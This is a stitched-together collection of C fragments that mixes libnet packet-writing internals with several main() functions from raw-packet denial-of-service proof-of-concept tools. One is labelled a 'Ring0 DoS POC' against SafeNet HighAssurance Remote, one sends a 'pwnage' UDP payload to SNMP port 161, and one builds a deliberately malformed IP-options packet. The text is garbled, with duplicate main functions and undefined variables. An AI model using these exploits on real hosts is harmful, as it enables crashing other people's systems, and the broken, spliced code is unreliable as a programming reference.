int
libnet_adv_write_raw_ipv4(libnet_t *l, const uint8_t *packet, uint32_t packet_s)
{
int c;
if (l->injection_type != LIBNET_RAW4_ADV)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): advanced raw4 mode not enabled\n", __func__);
return (-1);
}
c = libnet_write_raw_ipv4(l, packet, packet_s);
/* do statistics */
if (c == packet_s)
{
l->stats.packets_sent++;
l->stats.bytes_written += c;
}
else
{
l->stats.packet_errors++;
/*
* XXX - we probably should have a way to retrieve the number of
* bytes actually written (since we might have written something).
*/
if (c > 0)
{
l->stats.bytes_written += c;
}
}
return (c);
}
static void
send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip,
struct libnet_tcp_hdr *tcp)
{
int len;
ip->ip_hl = 5;
ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H);
ip->ip_id = libnet_get_prand(LIBNET_PRu16);
memcpy(buf, (u_char *)ip, LIBNET_IPV4_H);
tcp->th_off = 5;
tcp->th_win = htons(MIN_WIN);
memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H);
libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H);
len = LIBNET_IPV4_H + LIBNET_TCP_H;
if (libnet_write_raw_ipv4(l, buf, len) != len)
warn("write");
fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n",
libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport),
libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport),
ntohl(tcp->th_ack), 1);
}
int
main (int argc, char **argv)
{
u_char *buf = NULL;
/* libnet vars */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lnsock;
char *device = NULL;
/* packet vars */
struct ip *ip_hdr = NULL;
struct opt *opt_hdr = NULL;
u_int32_t src_ip = 0, dst_ip = 0;
printf ("SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS POC\n"
"by John Anderson <*****@*****.**>\n"
" mu-b <*****@*****.**>\n\n");
if (!argv[1])
{
printf ("Usage: %s <destination> [source]\n", argv[0]);
exit (EXIT_FAILURE);
}
/* allocate space for packet */
if ((buf = malloc (IPV6_HDR_LEN + UDP_LEN)) == NULL)
{
perror ("malloc: ");
exit (EXIT_FAILURE);
}
/* initialise libnet */
lnsock = libnet_init (LIBNET_RAW4_ADV, device, errbuf);
if (lnsock == NULL)
{
fprintf (stderr, "libnet_init() failed: %s", errbuf);
exit (-1);
}
if (!argv[2])
src_ip = lookup ("127.0.0.1");
else
src_ip = lookup (argv[2]);
dst_ip = lookup (argv[1]);
/* Build the pseudo-IPv4 header */
memset (buf, 0, sizeof buf);
ip_hdr = (struct ip *) buf;
ip_hdr->ip_v = 6;
ip_hdr->ip_hl = 0;
ip_hdr->ip_tos = 0;
ip_hdr->ip_len = htons (IPV6_HDR_LEN + UDP_LEN);
ip_hdr->ip_id = htons (0);
ip_hdr->ip_off = htons (0);
ip_hdr->ip_ttl = 0;
ip_hdr->ip_p = 0;
ip_hdr->ip_sum = 0;
ip_hdr->ip_src.s_addr = src_ip;
ip_hdr->ip_dst.s_addr = dst_ip;
/* Build option header with poison bytes */
opt_hdr = (struct opt *) (buf + IPV6_HDR_LEN);
opt_hdr->nxt_hdr = 0x3C; /* != 0x3B */
opt_hdr->opt_len = 0x07; /* length n such that:-
*(((u_char *)opt_hdr) + n * 2) != 0x3B &&
*(((u_char *)opt_hdr) + n * 2 + 1) == 0x00 &&
n * 2 < IPV6_HDR_LEN + UDP_LEN */
/* a value of 0x00 will suffice!@$%! */
printf ("Attacking %s", argv[1]);
libnet_write_raw_ipv4 (lnsock, buf, IPV6_HDR_LEN + UDP_LEN);
printf (".\n");
return (EXIT_SUCCESS);
}
int
libnet_write(libnet_t *l)
{
int c;
uint32_t len;
uint8_t *packet = NULL;
if (l == NULL)
{
return (-1);
}
c = libnet_pblock_coalesce(l, &packet, &len);
if (c == - 1)
{
/* err msg set in libnet_pblock_coalesce() */
return (-1);
}
/* assume error */
c = -1;
switch (l->injection_type)
{
case LIBNET_RAW4:
case LIBNET_RAW4_ADV:
if (len > LIBNET_MAX_PACKET)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): packet is too large (%d bytes)\n",
__func__, len);
goto done;
}
c = libnet_write_raw_ipv4(l, packet, len);
break;
case LIBNET_RAW6:
case LIBNET_RAW6_ADV:
c = libnet_write_raw_ipv6(l, packet, len);
break;
case LIBNET_LINK:
case LIBNET_LINK_ADV:
c = libnet_write_link(l, packet, len);
break;
default:
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): unsuported injection type\n", __func__);
goto done;
}
/* do statistics */
if (c == len)
{
l->stats.packets_sent++;
l->stats.bytes_written += c;
}
else
{
l->stats.packet_errors++;
/*
* XXX - we probably should have a way to retrieve the number of
* bytes actually written (since we might have written something).
*/
if (c > 0)
{
l->stats.bytes_written += c;
}
}
done:
/*
* Restore original pointer address so free won't complain about a
* modified chunk pointer.
*/
if (l->aligner > 0)
{
packet = packet - l->aligner;
}
free(packet);
return (c);
}
int
libnet_write_raw_ipv6(libnet_t *l, const uint8_t *packet, uint32_t size)
{
/* no difference in win32 */
return (libnet_write_raw_ipv4(l, packet, size));
}
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct udphdr *UDP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 3) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved source address.\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved destination address.\n");
exit(-1);
}
if ((buf = malloc(IP_MAXPACKET)) == NULL) {
perror("malloc");
exit(-1);
}
UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);
packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5; /* header length */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_UDP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
UDP->uh_sport = rand();
UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
UDP->uh_sum = 0;
memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("[+] Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
char *device = NULL;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct tcphdr *TCP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 4) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) {
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved source address\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved destination address\n");
exit(-1);
}
if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
perror("malloc");
exit(-1);
}
buf[20] = atoi(argv[3]);
buf[21] = 39; // our malformed size
for (c = 0; c<38; c+=3)
strncpy(&buf[22+c], "ECL", 3); // padding
TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX);
TCP->th_off = 5;
packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2);
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_TCP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
TCP->th_sport = htons(1337);
TCP->th_dport = htons(80);
TCP->th_seq = 0;
TCP->th_ack = 0;
TCP->th_x2 = 0;
TCP->th_flags = TH_SYN;
TCP->th_win = rand() & 0xffff;
TCP->th_sum = 0;
TCP->th_urp = 0;
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
